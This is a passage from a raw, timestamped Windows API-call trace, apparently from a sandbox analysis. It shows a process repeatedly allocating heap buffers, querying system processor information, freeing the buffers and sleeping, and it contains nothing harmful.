Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.588] Sleep (dwMilliseconds=0x110) [0240.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.598] Sleep (dwMilliseconds=0x110) [0240.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x2958008 [0240.618] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x2958008, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x2958008, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.618] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x2958008 | out: hHeap=0x2560000) returned 1 [0240.618] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x2958008 [0240.618] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x2958008, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x2958008, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x2958008 | out: hHeap=0x2560000) returned 1 [0240.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x2958008 [0240.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x2958008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x2958008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x2958008 | out: hHeap=0x2560000) returned 1 [0240.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295b4e8 [0240.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b4e8 | out: hHeap=0x2560000) returned 1 [0240.626] Sleep (dwMilliseconds=0x110) [0240.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x2958008 [0240.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x2958008, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x2958008, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x2958008 | out: hHeap=0x2560000) returned 1 [0240.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0240.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0240.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0240.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0240.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d4f8 [0240.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d4f8 | out: hHeap=0x2560000) returned 1 [0240.643] Sleep (dwMilliseconds=0x110) [0240.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0240.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0240.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0240.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0240.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0240.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0240.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.660] Sleep (dwMilliseconds=0x110) [0240.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0240.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0240.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0240.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0240.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0240.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0240.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0240.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0240.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.677] Sleep (dwMilliseconds=0x110) [0240.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0240.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0240.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0240.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0240.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0240.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0240.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.691] Sleep (dwMilliseconds=0x110) [0240.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0240.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0240.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0240.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0240.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0240.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0240.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0240.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0240.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.709] Sleep (dwMilliseconds=0x110) [0240.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0240.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0240.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0240.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0240.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0240.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0240.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0240.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0240.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.739] Sleep (dwMilliseconds=0x110) [0240.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0240.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0240.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0240.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0240.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.754] Sleep (dwMilliseconds=0x110) [0240.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0240.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0240.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0240.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0240.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0240.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0240.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.769] Sleep (dwMilliseconds=0x110) [0240.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0240.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0240.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0240.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0240.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0240.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.783] Sleep (dwMilliseconds=0x110) [0240.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0240.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0240.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0240.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0240.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0240.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0240.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.802] Sleep (dwMilliseconds=0x110) [0240.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0240.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0240.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0240.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0240.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0240.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0240.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.814] Sleep (dwMilliseconds=0x110) [0240.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0240.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0240.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0240.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0240.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0240.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0240.828] RtlAllocateHeap 